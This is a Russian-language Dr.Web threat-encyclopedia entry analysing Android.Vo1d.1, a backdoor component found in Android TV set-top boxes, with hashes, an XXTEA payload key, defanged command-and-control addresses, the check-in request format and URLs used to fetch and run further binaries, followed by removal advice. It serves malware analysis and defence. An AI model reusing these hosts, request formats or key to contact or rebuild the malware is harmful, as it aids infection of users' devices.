Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Android.Vo1d.1

Добавлен в вирусную базу Dr.Web: 2024-07-26

Описание добавлено:

SHA1-хеши:

  • f3732871371819532416cf2ec03ea103a3d61802 (/system/xbin/vo1d)
  • 675f9a34f6f8dc887e47aa85fffda41c178eb186 (расшифрованная полезная нагрузка)

Описание

Компонент вредоносной программы-бэкдора Android.Vo1d, обнаруженной в системной области ряда моделей ТВ-приставок на базе ОС Android. Его функциональность включает:

  • расшифровку полезной нагрузки;
  • отправку на C&C-сервер отчёта о запуске;
  • запуск компонента Android.Vo1d.3;
  • скачивание по заданным ссылкам и запуск двоичных файлов.

Принцип действия

Расшифровка полезной нагрузки

Android.Vo1d.1 извлекает из себя полезную нагрузку, для расшифровки которой используется алгоритм XXTEA с ключом fPNH830ES23QOPIM*&S955(2WR@L*&GF. Получаемый объект помещается в оперативную память. Фактически это основное тело Android.Vo1d.1, которое выполняет вредоносные задачи.

Отправка отчета о запуске

Android.Vo1d.1 отправляет POST-запрос по адресу hxxp[:]//bitemores[.]com/api/start:

POST hxxp[:]//bitemores[.]com/api/start
User-Agent curl/7.64.0
Accept */*
Content-Type application/json;charset=UTF-8

Пример запроса:


{
    "c": "-1",
    "ct": "2024-07-22 19:15:15",
    "dt": "0",
    "g": "10",
    "gt": "0",
    "i": "31",
    "nn": "/data/local/tmp/vo1d",
    "pd": "10993",
    "t": "0",
    "u": "1",
    "ud": "0",
    "uid": "",
    "v": "10",
    "vc": "",
    "vt": ""
}

где:

  • c — имеет значение 0, если компонент wd присутствует на устройстве, и значение -1, если он не найден;
  • ct — текущее время;
  • i — версия Android API;
  • u — расположение компонента wd;
  • nn — путь до исполняемого файла Android.Vo1d.1;
  • pd — pid процесса Android.Vo1d.1;
  • ud — uid (идентификатор пользователя), под которым запущен Android.Vo1d.1;
  • g — константа;
  • v — константа;
  • u — указывает на расположение компонента wd (Android.Vo1d.3).

Известные возможные варианты расположения двоичного файла wd:

  • /data/system/installd
  • /system/xbin/wd
  • /data/google/rild

Запуск компонента Android.Vo1d.3

Android.Vo1d запускает /system/xbin/wd (Android.Vo1d.3) и контролирует состояние активности его процесса, при необходимости перезапуская его.

Скачивание и запуск двоичных файлов по заданным ссылкам

Для скачивания исполняемых файлов Android.Vo1d.1 отправляет GET-запросы на следующие адреса:

  • http[:]//6f33933ce4a5c0e1b32fea736a61351a[.]com/v1.0.0/sv
  • http[:]//catmos99[.]com:81/v1.0.0/sv

Формат запросов:

GET HTTP/1.1 hxxp[:]//bitemores[.]com/api/start
User-Agent curl/7.64.0
Accept */*

С этих адресов троян получает ссылки, по которым скачивает и запускает целевые файлы.

Индикаторы компрометации

Подробнее об Android.Vo1d.3

Новость о трояне

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке